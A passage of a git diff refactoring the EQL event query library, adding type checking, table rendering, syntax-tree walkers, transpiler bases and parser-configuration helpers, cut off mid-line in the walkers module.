index 0000000..cef2e4b --- /dev/null +++ b/eql/signatures.py @@ -0,0 +1,37 @@ +"""Mixin for adding signature validation.""" +from eql.types import EXPRESSION, check_full_hint + + +class SignatureMixin(object): + """Type validation for arguments.""" + + minimum_args = None + # maximum_args = None + argument_types = [] + additional_types = None + + @classmethod + def validate(cls, arguments, type_hints=None): + """Find the first invalid argument. Return None if all are valid.""" + minimum_args = cls.minimum_args if cls.minimum_args is not None else len(cls.argument_types) + + if minimum_args is not None and len(arguments) < minimum_args: + return len(arguments), arguments, type_hints + + # if self.additional_types is not None and self.maximum_args is not None: + # if len(self.arguments) > self.maximum_args: + # return self.arguments[self.maximum_args or len(self.argument_types)] + + if type_hints is None: + type_hints = [EXPRESSION] * len(arguments) + + for i, node_hint in enumerate(type_hints): + if i >= len(cls.argument_types): + status = check_full_hint(cls.additional_types, node_hint) + else: + status = check_full_hint(cls.argument_types[i], node_hint) + + if not status: + return i, arguments, type_hints + + return None, arguments, type_hints diff --git a/eql/table.py b/eql/table.py new file mode 100644 index 0000000..c5c501c --- /dev/null +++ b/eql/table.py @@ -0,0 +1,286 @@ +"""Helper functionality for displaying pretty tables.""" +from collections import OrderedDict +import json +import textwrap +import re + +try: + from itertools import izip_longest +except ImportError: + from itertools import zip_longest as izip_longest + + +from .utils import to_unicode, is_number +join_lines = "\n".join + + +def get_schema(*dot_fields): + """Convert a list of dot_fields into a nested schema.""" + schema = OrderedDict() + for field in dot_fields: + sub_schema = schema + parts = [int(p) if p.isdigit() else p for p in re.split(r"[.\[\]]+", field) if p != ""] + for piece in parts[:-1]: + # It could be set explicitly to None, causing get(piece, {}) to return None + sub_schema[piece] = sub_schema.get(piece) or OrderedDict() + sub_schema = sub_schema[piece] + + # Now set this one to an empty dictionary + sub_schema[parts[-1]] = None + return schema + + +def headerspan(nested): + """For a nested schema object, created the ordered headers, and float empty cells to the bottom.""" + headers = [[]] + nested = nested + + for k in nested: + if nested and nested.get(k): + nested_headers = headerspan(nested[k]) + + # Figure out how long it was by counting the leaf nodes + span = len(nested_headers[-1]) + + # add a merged column to the top of the nested headers + nested_headers.insert(0, [(span, to_unicode(k))]) + + # the prefix will be appended on top new rows that will be added + prefix = [(s, '') for (s, _) in headers[0]] + + # walk from bottom to top, anchoring them to the bottom and moving up each time + for pos, nested_header in enumerate(reversed(nested_headers), 1): + # loop over each header in reverse order + if pos > len(headers): + headers.insert(0, prefix[:]) + headers[-pos].extend(nested_header) + else: + span = 1 + # put the key on the bottom + headers[-1].append((span, to_unicode(k))) + + # every row needs to grow at the top, depending on what's below it + for next_i, header in enumerate(headers[:-1], 1): + header.append((span, '')) + + return headers + + +def format_cell(cell, delim=", ", **kwargs): + """Convert a cell to the rendered contents.""" + if isinstance(cell, (list, tuple)): + return delim.join("{}".format(c) for c in cell) + elif isinstance(cell, (dict, bool)): + return json.dumps(cell) + elif cell is None: + return "" + elif is_number(cell): + return cell + else: + return to_unicode(cell) + + +def to_row(item, schema, **kwargs): + """Convert an item to a row for a table.""" + row = [] + for k, subschema in schema.items(): + if isinstance(item, dict): + cell = item.get(k) + elif isinstance(item, list) and isinstance(k, int) and 0 <= k < len(item): + cell = item[k] + else: + cell = None + + if not subschema: + row.append(format_cell(cell, **kwargs)) + else: + cells = [format_cell(c, **kwargs) for c in to_row(cell, schema[k])] + row.extend(cells) + return row + + +def _wrapped_lines(text, wrap): + """Wrap lines while preserving original line breaks.""" + lines = [] + for line in text.rstrip().splitlines(): + lines.extend(textwrap.wrap(line, wrap)) + return lines + + +class Table(object): + """Endgame pretty table base class.""" + + def __init__(self, body, num_columns=0, names=None, merged_headers=None, top=True, bottom=True, border=True, pad=1, + border_div='=', col_sep='|', wrap=None, row_outline=None, outline=None, row_div='-', align=None): + """Create a parameterized table with rows of cells.""" + # Create new rows based off the newlines + array_body = [] + self._align = [align or '<'] * num_columns + self._row_div = row_div + self._border_div = border_div + self._top = top + self._bottom = bottom + + # Try to guess the alignment by looking at the first row + if len(body) > 1: + first = body[0] + if num_columns == 0: + num_columns = len(first) + self._align = [align or '<'] * num_columns + + for i in range(num_columns): + cell = first[i] + if not align and is_number(cell): + self._align[i] = '>' + if isinstance(cell, float): + # convert all the rows to floats with nice decimals + for row in body: + if is_number(row[i]): + row[i] = "{:.3f}".format(row[i]) + + if not wrap: + for row in body: + split_cells = [to_unicode(c).rstrip().splitlines() for c in row] + array_body.append(list(izip_longest(*split_cells, fillvalue=''))) + else: + for row in body: + split_cells = [_wrapped_lines(to_unicode(c), wrap) for c in row] + array_body.append(list(izip_longest(*split_cells, fillvalue=''))) + + self._body = array_body + + # If the outline is set to None/auto, only add the outline if some of the rules span multiple lines + # if row_outline is None and outline is None: + # if any(len(row) > 1 for row in array_body): + # row_outline = True + + self._outline = row_outline or outline + self._padding = pad + self._pad = ' ' * self._padding + self._col_sep = col_sep if outline else ' ' + self._header_sep = self._col_sep.strip().center(len(self._col_sep)) + self._num_columns = num_columns + self._border = border + + if merged_headers: + self._headers = merged_headers + elif names: + self._headers = [[(1, k) for k in names]] + else: + self._headers = [] + + self._widths = None + self._row_width = None + + def calculate_widths(self): + """Calculate the autofit widths for each column.""" + self._widths = [0] * self._num_columns + for i in range(self._num_columns): + try: + self._widths[i] = max(len(line[i]) for row in self._body for line in row) + except ValueError: + pass + + delim_width = len(self._col_sep) + + # Now expand cells to accommodate for nested headers + for header in self._headers: + pos = 0 + for (span, k) in header: + min_width = len(k) + + # update every row that this spans over + num_delims = span - 1 + inner_widths = sum(self._widths[pos:pos + span]) + inner_padding = (self._padding * 2 + delim_width) * num_delims + total_widths = inner_widths + inner_padding + + delta = min_width - total_widths + + if delta > 0: + add_each = int(delta / span) + add_one = delta % span + for i, column in enumerate(range(pos, pos + span)): + self._widths[column] += add_each + self._widths[column] += i < add_one + pos += span + + self._row_width = (self._padding * 2 + delim_width) * self._num_columns + sum(self._widths) - delim_width + + def lines(self): + """Get the lines in the table.""" + self.calculate_widths() + delim_width = len(self._col_sep) + + join_row = self._col_sep.join + join_header = self._header_sep.join if len(self._headers) > 1 else join_row + rule_line = self._border_div * self._row_width + row_div = self._row_div * self._row_width + lines = [] + + if self._border and self._top: + lines.append(rule_line) + + for header in self._headers: + pos = 0 + cells = [] + + for (span, k) in header: # type: (int, str) + col_widths = sum(self._widths[pos:pos + span]) + num_delims = span - 1 + inner_padding = num_delims * self._padding * 2 + header_width = col_widths + inner_padding + (delim_width * num_delims) + + text = k.center(header_width) if span > 1 else k.ljust(header_width) + cells.append(self._pad + text + self._pad) + pos += span + lines.append(join_header(cells)) + + if len(self._headers): + lines.append(rule_line) + + # header_format = col_sep.join('{:^' + str(width) + '}' for width in widths) + + # Now generate the format string for each row + formats = [] + for i, (align, width) in enumerate(zip(self._align, self._widths)): + if align == '<' and i == self._num_columns - 1: + # No need to pad the right-most cell with empty space + width = "" + fmt = self._pad + '{:' + align + to_unicode(width) + "}" + self._pad + formats.append(fmt) + row_format = join_row(formats) + format_row = row_format.format + + for i, row in enumerate(self._body): + if i and self._outline: + lines.append(row_div) + lines.extend(format_row(*line) for line in row) + + if self._border and self._bottom: + lines.append(rule_line) + return lines + + @classmethod + def from_list(cls, dot_fields, results, **params): # type: (list[str], list[dict], str) -> Table + """Generate a table from a list of results.""" + schema = get_schema(*dot_fields) + num_columns = len(to_row({}, schema)) + body = [to_row(r, schema, **params) for r in results] + headers = headerspan(schema) + return Table(body, num_columns, merged_headers=headers, **params) + + def __iter__(self): + """Iterate over the lines in the table.""" + return (line + "\n" for line in self.lines()) + + def __unicode__(self): + """Python 2 and 3 unicode support.""" + return join_lines(self.lines()) + + def __str__(self): + """Python 2 and 3 utf8 encoding.""" + unicoded = self.__unicode__() + if not isinstance(unicoded, str): + return unicoded.encode("utf-8") + return unicoded diff --git a/eql/tests/__init__.py b/eql/tests/__init__.py new file mode 100644 index 0000000..077311f --- /dev/null +++ b/eql/tests/__init__.py @@ -0,0 +1,9 @@ +"""Helper tests for EQL.""" +from .base import TestEngine, QUERIES_FILE, EVENTS_FILE + + +__all__ = ( + "TestEngine", + "QUERIES_FILE", + "EVENTS_FILE", +) diff --git a/tests/base.py b/eql/tests/base.py similarity index 50% rename from tests/base.py rename to eql/tests/base.py index 079583b..2b19fc6 100644 --- a/tests/base.py +++ b/eql/tests/base.py @@ -1,64 +1,73 @@ -"""Base functionality for testing.""" +"""Helper class for validating EQL transpilers.""" import json import os import unittest +import toml + from eql.parser import parse_analytic -from eql.engines.base import Event +from eql.events import Event +from eql.etc import get_etc_path +from eql.schema import EMPTY_SCHEMA + DIR = os.path.dirname(os.path.abspath(__file__)) +QUERIES_FILE = get_etc_path("test_queries.toml") +EVENTS_FILE = get_etc_path("test_data.json") class TestEngine(unittest.TestCase): """Base test with helpful methods for getting example data and queries.""" - QUERIES_FILE = os.path.join(DIR, "test_queries.json") - EVENTS_FILE = os.path.join(DIR, "test_data.json") engine_name = 'base' - - _query_cache = {} + query_cache = {} + schema = EMPTY_SCHEMA + queries_file = QUERIES_FILE + events_file = EVENTS_FILE + __events = None @classmethod def get_analytic(cls, query_text): """Get a cached EQL analytic.""" - if query_text not in cls._query_cache: - analytic_info = { - 'metadata': {'id': 'query-{:d}'.format(len(cls._query_cache)), - 'name': query_text, - 'analytic_version': '1.0.0'}, - 'query': query_text - } - cls._query_cache[query_text] = parse_analytic(analytic_info) - return cls._query_cache[query_text] + with cls.schema: + if query_text not in cls.query_cache: + analytic_info = { + 'metadata': {'id': 'query-{:d}'.format(len(cls.query_cache)), 'name': query_text}, + 'query': query_text + } + cls.query_cache[query_text] = parse_analytic(analytic_info) + return cls.query_cache[query_text] - def test_valid_analytics(self): - """Confirm that the analytics in JSON are valid.""" - self.get_example_queries() + @classmethod + def get_events(cls): + """Get output events from test_data.json.""" + if cls.__events is None: + with open(cls.events_file, "r") as f: + data = json.load(f) + cls.__events = [Event.from_data(d) for d in data] + return cls.__events @classmethod def get_example_queries(cls): """Get example queries with their expected outputs.""" - with open(cls.QUERIES_FILE, "r") as f: - queries = json.load(f) + with open(cls.queries_file, "r") as f: + queries = list(q for _, q in sorted(toml.load(f)["queries"].items())) for q in queries: analytic = cls.get_analytic(q['query']) analytic.metadata['_info'] = q.copy() q['analytic'] = analytic return [q for q in queries if cls.engine_name not in q.get('skip', [])] + @classmethod + def get_example_analytics(cls): + """Get a list of example analytics from test queries.""" + return [q["analytic"] for q in cls.get_example_queries()] + def validate_results(self, actual, expected, query=None): """Validate that a list of results matches.""" self.assertListEqual(actual, expected, "Got {} but expected {} for analytic {}".format(actual, expected, query)) - _events = None - - @classmethod - def get_events(cls): - """Get output events from test_data.json.""" - if cls._events is None: - - with open(cls.EVENTS_FILE, "r") as f: - data = json.load(f) - cls._events = [Event.from_data(d) for d in data] - return cls._events + def test_valid_analytics(self): + """Confirm that the analytics in JSON are valid.""" + self.get_example_queries() diff --git a/eql/engines/base.py b/eql/transpilers.py similarity index 64% rename from eql/engines/base.py rename to eql/transpilers.py index f13691a..1e6c31b 100644 --- a/eql/engines/base.py +++ b/eql/transpilers.py @@ -1,13 +1,8 @@ -"""Base class for constructing an analytic engine with analytics.""" -from collections import namedtuple - -from eql.ast import * # noqa -from eql.parser import parse_definitions -from eql.schema import EVENT_TYPE_GENERIC, use_schema -from eql.utils import is_string - - -DEFAULT_TIME_UNIT = 10000000 # Windows FileTime 0.1 microseconds +"""Core EQL functionality for query translation.""" +from .ast import PreProcessor, Field +from .parser import parse_definitions, ignore_missing_functions +from .utils import is_string, ParserConfig +from .walkers import ConfigurableWalker class NodeMethods(dict): @@ -29,6 +24,18 @@ def decorator(f): return decorator + def replace(self, key): + """Add a callback method to the dictionary for a specific class. + + :param BaseNode key: The class of the object passed in + """ + def decorator(f): + """The function decorator that registers a method by node type.""" + self[key] = f + return f + + return decorator + def __call__(self, transpiler, node, *args, **kwargs): # type: (BaseTranspiler, BaseNode) -> object """Call the bound method for a node.""" cls = type(node) @@ -39,39 +46,26 @@ def __call__(self, transpiler, node, *args, **kwargs): # type: (BaseTranspiler, return unbound(transpiler, node, *args, **kwargs) -class ConfigurableWalker(AstWalker): - """Subclass for adding configurations to an walkers.""" - - def __init__(self, config=None): - """Create the walker with optional configuration.""" - self.config = config or {} - self.stack = [] - self.schema = self.get_config('schema') - super(ConfigurableWalker, self).__init__() - - def get_config(self, name, default=None): - """Get a property from the config dict.""" - return self.config.get(name, default) - - class BaseTranspiler(ConfigurableWalker): """Base Transpiler class for converting ASTs from one language to another.""" - converters = NodeMethods() - renderers = NodeMethods() - def __init__(self, config=None): """Instantiate the transpiler.""" super(BaseTranspiler, self).__init__(config) self.config = config or {} self.stack = [] # type: list[BaseNode] - self._time_unit = self.get_config('time_unit', DEFAULT_TIME_UNIT) # type: int self._counter = 0 - def counter(self): + @staticmethod + def is_variable(node): # type: (EqlNode) -> bool + """Check if a node is a variable for a callback function.""" + return isinstance(node, Field) and not node.path + + def counter(self, reset=False): """Increment counter and get current value.""" - self._counter += 1 - return self._counter + current = 0 if reset else self._counter + self._counter = current + 1 + return current def push(self, node): # type: (BaseNode) -> None """Push node onto stack.""" @@ -87,21 +81,20 @@ def pop_many(self, count): # type: (int) -> list[BaseNode] self.stack[-count:] = [] return popped - def convert(self, node): # type: (BaseNode) -> BaseNode - """Convert an AST node with the registered converter functions.""" - return self.converters(self, node) - -class BaseEngine(ConfigurableWalker): +class BaseEngine(ConfigurableWalker, ParserConfig): """Add and render EQL analytics to the generic engines.""" def __init__(self, config=None): """Create the engine with an optional list of files.""" - super(BaseEngine, self).__init__(config) + ConfigurableWalker.__init__(self, config) self.analytics = [] # type: list[EqlAnalytic] self.preprocessor = PreProcessor() - with use_schema(self.schema): + # Set the context for `with engine:` syntax + ParserConfig.__init__(self, preprocessor=self.preprocessor, schema=self._schema) + + with self.schema: definitions = self.get_config('definitions', []) if is_string(definitions): definitions = parse_definitions(definitions) @@ -109,7 +102,8 @@ def __init__(self, config=None): self.preprocessor.add_definitions(definitions) for path in self.get_config('definitions_files', []): - with open(path, 'r') as f: + # skip missing function errors, because these are actually macros + with ignore_missing_functions, open(path, 'r') as f: definitions = parse_definitions(f.read()) self.preprocessor.add_definitions(definitions) @@ -125,7 +119,6 @@ def add_analytics(self, analytics): self.add_analytic(analytic) -# noinspection PyAbstractClass class TextEngine(BaseEngine): """Converter for EQL to a target language script.""" @@ -181,47 +174,9 @@ def render(self, analytics_only=False): return '\n'.join(output_lines) -class Event(namedtuple('Event', ['type', 'time', 'data'])): - """Event for python engine in EQL.""" - - @classmethod - def from_data(cls, data): - """Load an event from a dictionary. - - :param dict data: Dictionary with the event type, time, and keys. - """ - data = data.get('data_buffer', data) - timestamp = data.get('timestamp', 0) - - if is_string(data.get('event_type')): - event_type = data['event_type'] - elif 'event_type_full' in data: - event_type = data['event_type_full'] - if event_type.endswith('_event'): - event_type = event_type[:-len('_event')] - else: - event_type = EVENT_TYPE_GENERIC - - return cls(event_type, timestamp, data) - - def copy(self): - """Create a copy of the event.""" - data = self.data.copy() - return Event(self.type, self.time, data) - - def register_extension(ext): """Decorator used for registering TextEngines with specific file extensions building.""" def decorator(cls): TextEngine.extensions[ext] = cls return cls return decorator - - -class AnalyticOutput(namedtuple('AnalyticOutput', ['analytic_id', 'events'])): - """AnalyticOutput for python engine in EQL.""" - - @classmethod - def from_data(cls, events, analytic_id=None): # type: (list[dict], str) -> AnalyticOutput - """Load up an analytic output event.""" - return cls(analytic_id, [Event.from_data(e) for e in events]) diff --git a/eql/types.py b/eql/types.py new file mode 100644 index 0000000..f5b9861 --- /dev/null +++ b/eql/types.py @@ -0,0 +1,213 @@ +"""EQL type system.""" + +BASE_STRING = "string" +BASE_NUMBER = "number" +BASE_BOOLEAN = "boolean" +BASE_NULL = "null" +BASE_STRICT_PRIMITIVES = BASE_STRING, BASE_NUMBER, BASE_BOOLEAN +BASE_PRIMITIVES = BASE_STRING, BASE_NUMBER, BASE_BOOLEAN, BASE_NULL + +VARIABLE = "variable" + +LITERAL_SPECIFIER = "literal" +DYNAMIC_SPECIFIER = "dynamic" +NO_SPECIFIER = "none" +SPECIFIERS = (LITERAL_SPECIFIER, DYNAMIC_SPECIFIER, NO_SPECIFIER) + +STRING = NO_SPECIFIER, BASE_STRING +NUMBER = NO_SPECIFIER, BASE_NUMBER +BOOLEAN = NO_SPECIFIER, BASE_BOOLEAN +NULL = NO_SPECIFIER, BASE_NULL +PRIMITIVES = NO_SPECIFIER, BASE_PRIMITIVES + + +class Array(tuple): + """Array of nested types.""" + + def __repr__(self): + """Representation string of the object.""" + return type(self).__name__ + tuple.__repr__(self) + + +class Nested(tuple): + """Schema of nested types.""" + + def subschema(self, name): + """Get the subschema, given a subfield.""" + for (key, value) in self: + if name == key: + return value + + if not self: + return BASE_ALL + + def __repr__(self): + """Representation string of the object.""" + return type(self).__name__ + tuple.__repr__(self) + + +def split(type_hint): + """Split the specifier from the type hint.""" + if isinstance(type_hint, tuple) and len(type_hint) == 2: + if type_hint[0] in SPECIFIERS: + return type_hint + + # Create one if it's not present + return NO_SPECIFIER, type_hint + + +def get_specifier(type_hint): + """Get only the specifier from a type hint.""" + spec, _ = split(type_hint) + return spec + + +def get_type(type_hint): + """Get only the type portion of the type hint.""" + _, hint = split(type_hint) + return hint + + +def dynamic(type_hint=None): + """Make a type hint dynamic.""" + if type_hint is None: + return DYNAMIC_SPECIFIER, BASE_ALL + return DYNAMIC_SPECIFIER, get_type(type_hint) + + +def literal(type_hint=None): + """Make a type hint literal.""" + if type_hint is None: + return LITERAL_SPECIFIER, BASE_ALL + return LITERAL_SPECIFIER, get_type(type_hint) + + +def clear(type_hint=None): + """Make a type hint literal.""" + if type_hint is None: + return NO_SPECIFIER, BASE_ALL + return NO_SPECIFIER, get_type(type_hint) + + +# Create a union of all of the full types +ARRAY = NO_SPECIFIER, Array() +PRIMITIVE_ARRAY = NO_SPECIFIER, Array(BASE_PRIMITIVES) +BASE_ALL = (BASE_STRING, BASE_NUMBER, BASE_BOOLEAN, BASE_NULL, Array(), Nested()) +EXPRESSION = NO_SPECIFIER, BASE_ALL + + +def union_specifiers(*specifiers): + """Union multiple hints together.""" + if DYNAMIC_SPECIFIER in specifiers: + return DYNAMIC_SPECIFIER + + # literals can't be unioned with other literals + return NO_SPECIFIER + + +def _flatten(v): + if is_union(v): + for v1 in v: + for v2 in _flatten(v1): + yield v2 + else: + yield v + + +def union_types(*base_hints): + """Union multiple type hints together.""" + base_hints = tuple(set(v for v in _flatten(base_hints))) + + if len(base_hints) == 1: + return base_hints[0] + return base_hints + + +def intersect_types(*base_hints): + """Intersect multiple type hints together.""" + base_hints = tuple(set(v for v in _flatten(base_hints))) + + if len(base_hints) == 1: + return base_hints[0] + return base_hints + + +def union(*type_hints): + """Union multiple hints together.""" + specifiers, base_hints = zip(*map(split, type_hints)) + return union_specifiers(*specifiers), union_types(*base_hints) + + +def is_union(type_hint): + """Determine if a type hint is a union of multiple types.""" + return isinstance(type_hint, tuple) and not isinstance(type_hint, (Array, Nested)) + + +def is_dynamic(type_hint): + """Check if a type hint is dynamic.""" + return get_specifier(type_hint) == DYNAMIC_SPECIFIER + + +def is_literal(type_hint): + """Check if a type hint is dynamic.""" + return get_specifier(type_hint) == LITERAL_SPECIFIER + + +def check_specifiers(expected_specifier, actual_specifier): + """Check that specifiers are satisfied.""" + if expected_specifier == NO_SPECIFIER: + return True + return expected_specifier == actual_specifier + + +def check_full_hint(expected_hint, actual_hint): + """Check that specifiers and types match.""" + expected_spec, expected_type = split(expected_hint) + actual_spec, actual_type = split(actual_hint) + return check_specifiers(expected_spec, actual_spec) and check_types(expected_type, actual_type) + + +def check_types(expected_type, actual_type): + """Asymmetric check if a type can be matched against another.""" + expected_type = get_type(expected_type) + actual_type = get_type(actual_type) + status = _check_types(expected_type, actual_type) + + return status + + +def _check_types(expected_type, actual_type): + if expected_type is BASE_ALL or actual_type is BASE_ALL: + return True + + if is_union(expected_type): + return any(_check_types(exp, actual_type) for exp in expected_type) + + if is_union(actual_type): + return any(_check_types(expected_type, act) for act in actual_type) + + # For two arrays, check that there is an intersection between the two + if isinstance(expected_type, Array): + if not isinstance(actual_type, Array): + return False + elif len(expected_type) == 0 or len(actual_type) == 0: + return True + return _check_types(union_types(*expected_type), union_types(*actual_type)) + + if isinstance(expected_type, Nested): + if not isinstance(actual_type, Nested): + return False + elif len(expected_type) == 0 or len(actual_type) == 0: + return True + + keys1, _ = zip(*expected_type) + keys2, _ = zip(*actual_type) + matching_keys = set(keys1) ^ set(keys2) + + # If any of the schemas intersect, then they can be compared + for key in matching_keys: + if _check_types(expected_type.subschema(key), actual_type.subschema(key)): + return True + return False + + return expected_type == actual_type diff --git a/eql/utils.py b/eql/utils.py index 20ca93a..841f10c 100644 --- a/eql/utils.py +++ b/eql/utils.py @@ -5,17 +5,10 @@ import json import os import sys +import threading -# Lazy load dynamic loaders -try: - import yaml -except ImportError: - yaml = None - -try: - import toml -except ImportError: - toml = None +PLUGIN_PREFIX = "eql_" +_loaded_plugins = False # Python2 and Python3 compatible type checking unicode_t = type(u"") @@ -34,14 +27,31 @@ numbers = int, float +# Optionally load dynamic loaders +try: + import yaml +except ImportError: + yaml = None + +try: + import toml +except ImportError: + toml = None + + def is_string(s): """Check if a python object is a unicode or ascii string.""" return isinstance(s, strings) -def is_number(s): +def is_number(n): """Check if a python object is a unicode or ascii string.""" - return isinstance(s, numbers) + return isinstance(n, numbers) + + +def is_array(a): + """Check if a number is array-like.""" + return isinstance(a, (list, tuple)) def str_presenter(dumper, data): @@ -140,17 +150,17 @@ def save_dump(contents, filename): def stream_json_lines(json_input): """Iterate over json lines to get Events.""" + decoder = json.JSONDecoder() for line in json_input: - line = line.strip() - if line.strip(): - yield json.loads(line) + if "{" in line: + yield decoder.decode(line) def stream_file_events(file_path, file_format=None, encoding="utf8"): """Stream a file as JSON. :param str file_path: Path to the file - :param str file_format: One of json.jgz, json.gz + :param str file_format: One of json/jsonl [.gz] :param str encoding: File encoding (ascii, utf8, utf16, etc.) """ gz_ext = '.gz' @@ -204,3 +214,135 @@ def stream_events(fileobj, file_format="json"): return json.load(fileobj) raise NotImplementedError("Unexpected format: {}".format(file_format)) + + +def is_stateful(query): + """Determine if a query requires any state tracking or if logic is atomic. + + :param ast.PipedQuery|ast.Analytic query: The parsed query AST to analyze + :rtype: bool + """ + # Resolve circular dependency for is_stateless + from . import ast # noqa: E402 + from . import pipes # noqa: E402 + + if not isinstance(query, ast.EqlNode): + raise TypeError("unsupported type {} to is_stateful. Expected {}".format(type(query), ast.EqlNode)) + + stateful_nodes = ( + ast.SubqueryBy, # join/sequence + ast.NamedSubquery, # child/descendant/event of + pipes.CountPipe, pipes.UniqueCountPipe, # pipes count/unique_count + + # some pipe combinations, such as "| sort field | head 5" are questionable + ) + + return any(isinstance(node, stateful_nodes) for node in query) + + +def match_kv(condition): + """Take a list of key value pairs and generate an EQL expression. + + :param dict condition: The source text query + :rtype: ast.Expression + """ + # Resolve circular dependency for match_kv + from . import ast # noqa: E402 + from .parser import parse_expression + + if not isinstance(condition, dict): + raise TypeError("unsupported type {} to match_kv. Expected {}".format(type(condition), ast.EqlNode)) + + and_node = ast.Boolean(True) + + for field_text, field_match in sorted(condition.items()): + if not isinstance(field_match, (list, tuple)): + field_match = [field_match] + + field_node = parse_expression(field_text) + if not isinstance(field_node, ast.Field): + raise TypeError("expected Field as key to dictionary, got {}".format(type(field_node).__name__)) + + exact = [] + wildcards = [] + for term in field_match: + literal = ast.Literal.from_python(term) # this may raise a TypeError + if isinstance(literal, ast.String) and "*" in literal.value: + wildcards.append(literal) + else: + exact.append(literal) + + match_node = ast.InSet(field_node, exact).optimize() + if wildcards: + match_node |= ast.FunctionCall("wildcard", [field_node] + wildcards) + and_node &= match_node + + return and_node + + +def load_extensions(force=False): + """Load EQL extensions.""" + global _loaded_plugins + + if force or not _loaded_plugins: + import pkgutil + import importlib + + _loaded_plugins = True + + for module_loader, name, ispkg in pkgutil.iter_modules(): + if name.startswith(PLUGIN_PREFIX): + importlib.import_module(name) + + +class ParserConfig(object): + """Context manager for handling parser configurations.""" + + __stacks = threading.local() + + def __init__(self, *managers, **config): + """Set the current status.""" + self.managers = managers + self.context = {k: v for k, v in config.items() if v is not None} + super(ParserConfig, self).__init__() + + @classmethod + def get_stack(cls, name): + """Get a stack and initialize it to empty.""" + return cls.__stacks.__dict__.setdefault(name, []) + + @classmethod + def push_stack(cls, name, value): + """Push a value onto a stack for the current thread.""" + cls.get_stack(name).append(value) + + @classmethod + def pop_stack(cls, name): + """Pop the last value of the thread.""" + return cls.get_stack(name).pop() + + @classmethod + def read_stack(cls, name, default=None, silent=True): + """Read the current value of the thread.""" + stack = cls.get_stack(name) + if silent and len(stack) == 0: + return default + return stack[-1] + + def __enter__(self): + """Enter a with statement.""" + for mgr in self.managers: + mgr.__enter__() + + for k, v in self.context.items(): + self.push_stack(k, v) + + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + """Pop from the stack.""" + for k in self.context: + self.pop_stack(k) + + for mgr in reversed(self.managers): + mgr.__exit__(exc_type, exc_val, exc_tb) diff --git a/eql/walkers.py b/eql/walkers.py new file mode 100644 index 0000000..f21f873 --- /dev/null +++ b/eql/walkers.py @@ -0,0 +1,238 @@ +"""EQL walker classes.""" +import re +from collections import defaultdict, deque +from contextlib import contextmanager + +from .schema import Schema +from .utils import is_string, to_unicode + + +__all__ = ( + "Walker", + "RecursiveWalker", + "ConfigurableWalker", + "DepthFirstWalker", +) + + +DEFAULT_TIME_UNIT = 10000000 # Windows FileTime 0.1 microseconds + + +class Walker(object): + """Base class that provides functionality for walking abstract syntax trees of eql.BaseNode.""" + + __camelcache = {} + + def __init__(self): + """Create the AST walker.""" + object.__init__(self) + self._method_cache = defaultdict(dict) + self.event_stack = [] + self.in_pipes = [] + self.base_event_types = [] + self.node_stack = [] + + def register_func(self, node_cls, func, prefix="_walk_"): + """Register a callback function.""" + camelized = self.camelized(node_cls) + method_name = prefix + camelized + setattr(self, method_name, func) + + def iter_node(self, node): + """Iterate through a syntax tree.""" + if isinstance(node, BaseNode): + yield node + + for descendant in self.iter_node([v for v in node.iter_slots()]): + yield descendant + elif isinstance(node, (list, tuple)): + for n in node: + for descendant in self.iter_node(n): + yield descendant + elif isinstance(node, dict): + for n in self.iter_node(node.items()): + yield n + + @classmethod + def camelized(cls, node_cls): + """Get the camelized name for the class.""" + if is_string(node_cls): + class_name = node_cls + else: + if not isinstance(node_cls, type): + node_cls = type(node_cls) + class_name = node_cls.__name__ + if class_name not in cls.__camelcache: + pass1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', class_name) + pass2 = re.sub('([a-z0-9])([A-Z])', r'\1_\2', pass1) + cls.__camelcache[class_name] = to_unicode(pass2.lower()) + return cls.__camelcache[class_name] + + @property + def current_event_type(self): + """Get the active event type while walking.""" + if self.event_stack: + return self.event_stack[-1] + + def _enter(self, node): + self.event_stack.append(node.event_type) + + def _enter_event_query(self, node): + self.event_stack.append(node.event_type) + + def _enter_piped_query(self, node): # type: (PipedQuery) -> None + self.base_event_types = [] + if isinstance(node.first, EventQuery): + self.base_event_types.append(node.first.event_type) + else: + self.base_event_types.extend(q.query.event_type for q in node.first.queries) + + def _enter_pipe_command(self, node): + self.in_pipes = True + + def _enter_subquery_by(self, node): + self.event_stack.append(node.query.event_type) + + def _exit_subquery_by(self, node): + self.event_stack.pop() + + def _exit_event_query(self, node): + self.event_stack.pop() + + def _exit_piped_query(self, node): + self.base_event_types = [] + + def _exit_pipe_command(self, node): + self.in_pipes = False + + def _walk_default(self, node, *args, **kwargs): + return node + + def get_node_method(self, node_cls, prefix): # type: (BaseNode, str) -> callable + """Get the walk method for a node.""" + if not isinstance(node_cls, type): + node_cls = type(node_cls) + + if node_cls in self._method_cache[prefix]: + return self._method_cache[prefix][node_cls] + + queue = deque([node_cls]) + method = None + + while queue: + next_cls = queue.popleft() + method_name = prefix + self.camelized(next_cls) + method = getattr(self, method_name, None) + if callable(method): + break + + queue.extend(next_cls.__bases__) + + method = method or getattr(self, prefix + "default", None) + self._method_cache[prefix][node_cls] = method + return method + + def _walk_list(self, nodes, *args, **kwargs): + return [self.walk(n, *args, **kwargs) for n in nodes] + + def _walk_tuple(self, nodes, *args, **kwargs): + return tuple(self.walk(n, *args, **kwargs) for n in nodes) + + def _walk_dict(self, nodes, *args, **kwargs): + return dict({self.walk(k, *args, **kwargs): self.walk(v, *args, **kwargs) for k, v in nodes.items()}) + + @property + def active_node(self): + """Get the active context.""" + return self.node_stack[-1] + + @property + def parent_node(self): + """Get the parent context.""" + return self.node_stack[-2] + + @contextmanager + def set_context(self, node): + """Push a node onto the context stack.""" + enter_method = self.get_node_method(node, prefix="_enter_") + exit_method = self.get_node_method(node, prefix="_exit_") + + if callable(enter_method): + enter_method(node) + + self.node_stack.append(node) + + try: + yield node + finally: + self.node_stack.pop() + if callable(exit_method): + exit_method(node) + + def walk(self, node, *args, **kwargs): + """Walk the syntax tree top-down.""" + method = self.get_node_method(node, "_walk_") + if callable(method): + with self.set_context(node): + return method(node, *args, **kwargs) + + +class RecursiveWalker(Walker): + """Walker that will recursively walk and transform a tree.""" + + def _walk_base_node(self, node, *args, **kwargs): # type: (BaseNode) -> BaseNode + cls = type(node) + slots = [self.walk(v, *args, **kwargs) for k, v in node.iter_slots()] + return cls(*slots).optimize() + + def copy_node(self, node): + """Create a copy of a node.""" + return self.walk(node) + + +class DepthFirstWalker(Walker): + """Walk an AST bottom up.""" + + def walk(self, node, *args, **kwargs): + """Walk the syntax tree top-down.""" + method = self.get_node_method(node, "_walk_") + if callable(method): + with self.set_context(node): + if isinstance(node, BaseNode): + slots = 